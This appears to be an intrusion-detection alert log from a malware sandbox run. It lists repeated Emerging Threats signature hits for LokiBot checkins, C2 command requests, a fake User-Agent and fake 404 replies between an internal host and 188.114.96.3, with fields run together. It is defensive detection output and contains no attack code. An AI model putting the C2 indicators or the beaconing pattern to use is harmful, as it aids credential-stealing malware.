                  2024-09-25T15:28:40.175614+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449733188.114.96.380TCP
                  2024-09-25T15:28:40.181088+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449733TCP
                  2024-09-25T15:28:40.334278+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449734188.114.96.380TCP
                  2024-09-25T15:28:40.334278+02002025381ET MALWARE LokiBot Checkin1192.168.2.449734188.114.96.380TCP
                  2024-09-25T15:28:40.334278+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449734188.114.96.380TCP
                  2024-09-25T15:28:41.113236+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449734188.114.96.380TCP
                  2024-09-25T15:28:41.113236+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449734188.114.96.380TCP
                  2024-09-25T15:28:41.118035+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449734TCP
                  2024-09-25T15:28:41.272883+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449735188.114.96.380TCP
                  2024-09-25T15:28:41.272883+02002025381ET MALWARE LokiBot Checkin1192.168.2.449735188.114.96.380TCP
                  2024-09-25T15:28:41.272883+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449735188.114.96.380TCP
                  2024-09-25T15:28:41.990383+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449735188.114.96.380TCP
                  2024-09-25T15:28:41.990383+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449735188.114.96.380TCP
                  2024-09-25T15:28:41.995245+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449735TCP
                  2024-09-25T15:28:42.154915+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449736188.114.96.380TCP
                  2024-09-25T15:28:42.154915+02002025381ET MALWARE LokiBot Checkin1192.168.2.449736188.114.96.380TCP
                  2024-09-25T15:28:42.154915+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449736188.114.96.380TCP
                  2024-09-25T15:28:42.845238+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449736188.114.96.380TCP
                  2024-09-25T15:28:42.845238+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449736188.114.96.380TCP
                  2024-09-25T15:28:42.850104+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449736TCP
                  2024-09-25T15:28:43.005872+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449737188.114.96.380TCP
                  2024-09-25T15:28:43.005872+02002025381ET MALWARE LokiBot Checkin1192.168.2.449737188.114.96.380TCP
                  2024-09-25T15:28:43.005872+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449737188.114.96.380TCP
                  2024-09-25T15:28:43.869838+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449737188.114.96.380TCP
                  2024-09-25T15:28:43.869838+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449737188.114.96.380TCP
                  2024-09-25T15:28:43.875473+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449737TCP
                  2024-09-25T15:28:44.024460+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449738188.114.96.380TCP
                  2024-09-25T15:28:44.024460+02002025381ET MALWARE LokiBot Checkin1192.168.2.449738188.114.96.380TCP
                  2024-09-25T15:28:44.024460+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449738188.114.96.380TCP
                  2024-09-25T15:28:44.707278+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449738188.114.96.380TCP
                  2024-09-25T15:28:44.707278+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449738188.114.96.380TCP
                  2024-09-25T15:28:44.712136+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449738TCP
                  2024-09-25T15:28:44.864953+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449739188.114.96.380TCP
                  2024-09-25T15:28:44.864953+02002025381ET MALWARE LokiBot Checkin1192.168.2.449739188.114.96.380TCP
                  2024-09-25T15:28:44.864953+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449739188.114.96.380TCP
                  2024-09-25T15:28:45.626258+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449739188.114.96.380TCP
                  2024-09-25T15:28:45.626258+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449739188.114.96.380TCP
                  2024-09-25T15:28:45.631218+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449739TCP
                  2024-09-25T15:28:45.794467+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449740188.114.96.380TCP
                  2024-09-25T15:28:45.794467+02002025381ET MALWARE LokiBot Checkin1192.168.2.449740188.114.96.380TCP
                  2024-09-25T15:28:45.794467+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449740188.114.96.380TCP
                  2024-09-25T15:28:46.435201+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449740188.114.96.380TCP
                  2024-09-25T15:28:46.435201+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449740188.114.96.380TCP
                  2024-09-25T15:28:46.440257+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449740TCP
                  2024-09-25T15:28:46.586604+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449741188.114.96.380TCP
                  2024-09-25T15:28:46.586604+02002025381ET MALWARE LokiBot Checkin1192.168.2.449741188.114.96.380TCP
                  2024-09-25T15:28:46.586604+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449741188.114.96.380TCP
                  2024-09-25T15:28:47.272281+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449741188.114.96.380TCP
                  2024-09-25T15:28:47.272281+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449741188.114.96.380TCP
                  2024-09-25T15:28:47.278219+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449741TCP
                  2024-09-25T15:28:47.459806+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449743188.114.96.380TCP
                  2024-09-25T15:28:47.459806+02002025381ET MALWARE LokiBot Checkin1192.168.2.449743188.114.96.380TCP
                  2024-09-25T15:28:47.459806+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449743188.114.96.380TCP
                  2024-09-25T15:28:48.160931+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449743188.114.96.380TCP
                  2024-09-25T15:28:48.160931+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449743188.114.96.380TCP
                  2024-09-25T15:28:48.165787+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449743TCP
                  2024-09-25T15:28:48.329147+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449745188.114.96.380TCP
                  2024-09-25T15:28:48.329147+02002025381ET MALWARE LokiBot Checkin1192.168.2.449745188.114.96.380TCP
                  2024-09-25T15:28:48.329147+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449745188.114.96.380TCP
                  2024-09-25T15:28:49.039252+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449745188.114.96.380TCP
                  2024-09-25T15:28:49.039252+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449745188.114.96.380TCP
                  2024-09-25T15:28:49.044212+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449745TCP
                  2024-09-25T15:28:49.199142+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449747188.114.96.380TCP
                  2024-09-25T15:28:49.199142+02002025381ET MALWARE LokiBot Checkin1192.168.2.449747188.114.96.380TCP
                  2024-09-25T15:28:49.199142+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449747188.114.96.380TCP
                  2024-09-25T15:28:49.978517+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449747188.114.96.380TCP
                  2024-09-25T15:28:49.978517+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449747188.114.96.380TCP
                  2024-09-25T15:28:49.983395+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449747TCP
                  2024-09-25T15:28:50.188831+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449749188.114.96.380TCP
                  2024-09-25T15:28:50.188831+02002025381ET MALWARE LokiBot Checkin1192.168.2.449749188.114.96.380TCP
                  2024-09-25T15:28:50.188831+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449749188.114.96.380TCP
                  2024-09-25T15:28:50.952046+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449749188.114.96.380TCP
                  2024-09-25T15:28:50.952046+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449749188.114.96.380TCP
                  2024-09-25T15:28:50.956867+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449749TCP
                  2024-09-25T15:28:51.102415+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455890188.114.96.380TCP
                  2024-09-25T15:28:51.102415+02002025381ET MALWARE LokiBot Checkin1192.168.2.455890188.114.96.380TCP
                  2024-09-25T15:28:51.102415+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455890188.114.96.380TCP
                  2024-09-25T15:28:51.830924+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455890188.114.96.380TCP
                  2024-09-25T15:28:51.830924+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455890188.114.96.380TCP
                  2024-09-25T15:28:51.835887+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455890TCP
                  2024-09-25T15:28:51.992772+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455892188.114.96.380TCP
                  2024-09-25T15:28:51.992772+02002025381ET MALWARE LokiBot Checkin1192.168.2.455892188.114.96.380TCP
                  2024-09-25T15:28:51.992772+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455892188.114.96.380TCP
                  2024-09-25T15:28:52.731636+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455892188.114.96.380TCP
                  2024-09-25T15:28:52.731636+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455892188.114.96.380TCP
                  2024-09-25T15:28:52.736496+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455892TCP
                  2024-09-25T15:28:52.881678+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455893188.114.96.380TCP
                  2024-09-25T15:28:52.881678+02002025381ET MALWARE LokiBot Checkin1192.168.2.455893188.114.96.380TCP
                  2024-09-25T15:28:52.881678+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455893188.114.96.380TCP
                  2024-09-25T15:28:53.550696+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455893188.114.96.380TCP
                  2024-09-25T15:28:53.550696+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455893188.114.96.380TCP
                  2024-09-25T15:28:53.555610+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455893TCP
                  2024-09-25T15:28:53.727656+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455894188.114.96.380TCP
                  2024-09-25T15:28:53.727656+02002025381ET MALWARE LokiBot Checkin1192.168.2.455894188.114.96.380TCP
                  2024-09-25T15:28:53.727656+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455894188.114.96.380TCP
                  2024-09-25T15:28:54.379847+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455894188.114.96.380TCP
                  2024-09-25T15:28:54.379847+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455894188.114.96.380TCP
                  2024-09-25T15:28:54.384675+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455894TCP
                  2024-09-25T15:28:54.537764+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455895188.114.96.380TCP
                  2024-09-25T15:28:54.537764+02002025381ET MALWARE LokiBot Checkin1192.168.2.455895188.114.96.380TCP
                  2024-09-25T15:28:54.537764+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455895188.114.96.380TCP
                  2024-09-25T15:28:55.230197+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455895188.114.96.380TCP
                  2024-09-25T15:28:55.230197+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455895188.114.96.380TCP
                  2024-09-25T15:28:55.235087+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455895TCP
                  2024-09-25T15:28:55.513579+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455896188.114.96.380TCP
                  2024-09-25T15:28:55.513579+02002025381ET MALWARE LokiBot Checkin1192.168.2.455896188.114.96.380TCP
                  2024-09-25T15:28:55.513579+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455896188.114.96.380TCP
                  2024-09-25T15:28:56.263321+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455896188.114.96.380TCP
                  2024-09-25T15:28:56.263321+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455896188.114.96.380TCP
                  2024-09-25T15:28:56.268225+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455896TCP
                  2024-09-25T15:28:56.412404+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455897188.114.96.380TCP
                  2024-09-25T15:28:56.412404+02002025381ET MALWARE LokiBot Checkin1192.168.2.455897188.114.96.380TCP
                  2024-09-25T15:28:56.412404+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455897188.114.96.380TCP
                  2024-09-25T15:28:57.191920+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455897188.114.96.380TCP
                  2024-09-25T15:28:57.191920+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455897188.114.96.380TCP
                  2024-09-25T15:28:57.196981+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455897TCP
                  2024-09-25T15:28:57.598723+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455898188.114.96.380TCP
                  2024-09-25T15:28:57.598723+02002025381ET MALWARE LokiBot Checkin1192.168.2.455898188.114.96.380TCP
                  2024-09-25T15:28:57.598723+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455898188.114.96.380TCP
                  2024-09-25T15:28:58.321400+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455898188.114.96.380TCP
                  2024-09-25T15:28:58.321400+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455898188.114.96.380TCP
                  2024-09-25T15:28:58.326273+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455898TCP
                  2024-09-25T15:28:58.474678+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455899188.114.96.380TCP
                  2024-09-25T15:28:58.474678+02002025381ET MALWARE LokiBot Checkin1192.168.2.455899188.114.96.380TCP
                  2024-09-25T15:28:58.474678+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455899188.114.96.380TCP
                  2024-09-25T15:28:59.169488+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455899188.114.96.380TCP
                  2024-09-25T15:28:59.169488+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455899188.114.96.380TCP
                  2024-09-25T15:28:59.176151+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455899TCP
                  2024-09-25T15:28:59.484196+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455900188.114.96.380TCP
                  2024-09-25T15:28:59.484196+02002025381ET MALWARE LokiBot Checkin1192.168.2.455900188.114.96.380TCP
                  2024-09-25T15:28:59.484196+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455900188.114.96.380TCP
                  2024-09-25T15:29:00.300722+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455900188.114.96.380TCP
                  2024-09-25T15:29:00.300722+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455900188.114.96.380TCP
                  2024-09-25T15:29:00.305746+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455900TCP
                  2024-09-25T15:29:00.473536+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455901188.114.96.380TCP
                  2024-09-25T15:29:00.473536+02002025381ET MALWARE LokiBot Checkin1192.168.2.455901188.114.96.380TCP
                  2024-09-25T15:29:00.473536+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455901188.114.96.380TCP
                  2024-09-25T15:29:01.202417+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455901188.114.96.380TCP
                  2024-09-25T15:29:01.202417+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455901188.114.96.380TCP
                  2024-09-25T15:29:01.207280+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455901TCP
                  2024-09-25T15:29:01.372433+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455902188.114.96.380TCP
                  2024-09-25T15:29:01.372433+02002025381ET MALWARE LokiBot Checkin1192.168.2.455902188.114.96.380TCP
                  2024-09-25T15:29:01.372433+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455902188.114.96.380TCP
                  2024-09-25T15:29:02.085525+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455902188.114.96.380TCP
                  2024-09-25T15:29:02.085525+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455902188.114.96.380TCP
                  2024-09-25T15:29:02.090433+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455902TCP
                  2024-09-25T15:29:02.239881+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455903188.114.96.380TCP
                  2024-09-25T15:29:02.239881+02002025381ET MALWARE LokiBot Checkin1192.168.2.455903188.114.96.380TCP
                  2024-09-25T15:29:02.239881+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455903188.114.96.380TCP
                  2024-09-25T15:29:03.023456+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455903188.114.96.380TCP
                  2024-09-25T15:29:03.023456+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455903188.114.96.380TCP
                  2024-09-25T15:29:03.028345+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455903TCP
                  2024-09-25T15:29:03.276280+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455904188.114.96.380TCP
                  2024-09-25T15:29:03.276280+02002025381ET MALWARE LokiBot Checkin1192.168.2.455904188.114.96.380TCP
                  2024-09-25T15:29:03.276280+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455904188.114.96.380TCP
                  2024-09-25T15:29:03.936890+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455904188.114.96.380TCP
                  2024-09-25T15:29:03.936890+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455904188.114.96.380TCP
                  2024-09-25T15:29:03.941766+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455904TCP
                  2024-09-25T15:29:04.099861+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455905188.114.96.380TCP
                  2024-09-25T15:29:04.099861+02002025381ET MALWARE LokiBot Checkin1192.168.2.455905188.114.96.380TCP
                  2024-09-25T15:29:04.099861+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455905188.114.96.380TCP
                  2024-09-25T15:29:04.757534+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455905188.114.96.380TCP
                  2024-09-25T15:29:04.757534+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455905188.114.96.380TCP
                  2024-09-25T15:29:04.762456+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455905TCP
                  2024-09-25T15:29:04.914672+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455906188.114.96.380TCP
                  2024-09-25T15:29:04.914672+02002025381ET MALWARE LokiBot Checkin1192.168.2.455906188.114.96.380TCP
                  2024-09-25T15:29:04.914672+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455906188.114.96.380TCP
                  2024-09-25T15:29:05.574850+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455906188.114.96.380TCP
                  2024-09-25T15:29:05.574850+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455906188.114.96.380TCP
                  2024-09-25T15:29:05.579762+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455906TCP
                  2024-09-25T15:29:05.723093+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455907188.114.96.380TCP
                  2024-09-25T15:29:05.723093+02002025381ET MALWARE LokiBot Checkin1192.168.2.455907188.114.96.380TCP
                  2024-09-25T15:29:05.723093+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455907188.114.96.380TCP
                  2024-09-25T15:29:06.426526+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455907188.114.96.380TCP
                  2024-09-25T15:29:06.426526+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455907188.114.96.380TCP
                  2024-09-25T15:29:06.431327+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455907TCP
                  2024-09-25T15:29:06.587971+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455908188.114.96.380TCP
                  2024-09-25T15:29:06.587971+02002025381ET MALWARE LokiBot Checkin1192.168.2.455908188.114.96.380TCP
                  2024-09-25T15:29:06.587971+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455908188.114.96.380TCP
                  2024-09-25T15:29:07.270520+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455908188.114.96.380TCP
                  2024-09-25T15:29:07.270520+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455908188.114.96.380TCP
                  2024-09-25T15:29:07.275362+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455908TCP
                  2024-09-25T15:29:07.449997+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455909188.114.96.380TCP
                  2024-09-25T15:29:07.449997+02002025381ET MALWARE LokiBot Checkin1192.168.2.455909188.114.96.380TCP
                  2024-09-25T15:29:07.449997+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455909188.114.96.380TCP
                  2024-09-25T15:29:08.155785+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455909188.114.96.380TCP
                  2024-09-25T15:29:08.155785+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455909188.114.96.380TCP
                  2024-09-25T15:29:08.160820+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455909TCP
                  2024-09-25T15:29:08.319578+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455910188.114.96.380TCP
                  2024-09-25T15:29:08.319578+02002025381ET MALWARE LokiBot Checkin1192.168.2.455910188.114.96.380TCP
                  2024-09-25T15:29:08.319578+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455910188.114.96.380TCP
                  2024-09-25T15:29:09.003544+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455910188.114.96.380TCP
                  2024-09-25T15:29:09.003544+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455910188.114.96.380TCP
                  2024-09-25T15:29:09.008486+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455910TCP
                  2024-09-25T15:29:09.181026+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455911188.114.96.380TCP
                  2024-09-25T15:29:09.181026+02002025381ET MALWARE LokiBot Checkin1192.168.2.455911188.114.96.380TCP
                  2024-09-25T15:29:09.181026+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455911188.114.96.380TCP
                  2024-09-25T15:29:09.872961+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455911188.114.96.380TCP
                  2024-09-25T15:29:09.872961+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455911188.114.96.380TCP
                  2024-09-25T15:29:09.877822+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455911TCP
                  2024-09-25T15:29:10.039622+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455912188.114.96.380TCP
                  2024-09-25T15:29:10.039622+02002025381ET MALWARE LokiBot Checkin1192.168.2.455912188.114.96.380TCP
                  2024-09-25T15:29:10.039622+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455912188.114.96.380TCP
                  2024-09-25T15:29:10.728142+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455912188.114.96.380TCP
                  2024-09-25T15:29:10.728142+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455912188.114.96.380TCP
                  2024-09-25T15:29:10.733142+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455912TCP
                  2024-09-25T15:29:10.892410+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455913188.114.96.380TCP
                  2024-09-25T15:29:10.892410+02002025381ET MALWARE LokiBot Checkin1192.168.2.455913188.114.96.380TCP
                  2024-09-25T15:29:10.892410+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455913188.114.96.380TCP
                  2024-09-25T15:29:11.581836+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455913188.114.96.380TCP
                  2024-09-25T15:29:11.581836+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455913188.114.96.380TCP
                  2024-09-25T15:29:11.588290+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455913TCP
                  2024-09-25T15:29:11.755447+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455914188.114.96.380TCP
                  2024-09-25T15:29:11.755447+02002025381ET MALWARE LokiBot Checkin1192.168.2.455914188.114.96.380TCP
                  2024-09-25T15:29:11.755447+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455914188.114.96.380TCP
                  2024-09-25T15:29:12.445970+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455914188.114.96.380TCP
                  2024-09-25T15:29:12.445970+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455914188.114.96.380TCP
                  2024-09-25T15:29:12.450993+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455914TCP
                  2024-09-25T15:29:12.608011+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455915188.114.96.380TCP
                  2024-09-25T15:29:12.608011+02002025381ET MALWARE LokiBot Checkin1192.168.2.455915188.114.96.380TCP
                  2024-09-25T15:29:12.608011+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455915188.114.96.380TCP
                  2024-09-25T15:29:13.328556+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455915188.114.96.380TCP
                  2024-09-25T15:29:13.328556+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455915188.114.96.380TCP
                  2024-09-25T15:29:13.333492+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455915TCP
                  2024-09-25T15:29:13.487014+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455916188.114.96.380TCP
                  2024-09-25T15:29:13.487014+02002025381ET MALWARE LokiBot Checkin1192.168.2.455916188.114.96.380TCP
                  2024-09-25T15:29:13.487014+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455916188.114.96.380TCP
                  2024-09-25T15:29:14.284533+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455916188.114.96.380TCP
                  2024-09-25T15:29:14.284533+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455916188.114.96.380TCP
                  2024-09-25T15:29:14.289431+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455916TCP
                  2024-09-25T15:29:14.457362+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455917188.114.96.380TCP
                  2024-09-25T15:29:14.457362+02002025381ET MALWARE LokiBot Checkin1192.168.2.455917188.114.96.380TCP
                  2024-09-25T15:29:14.457362+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455917188.114.96.380TCP
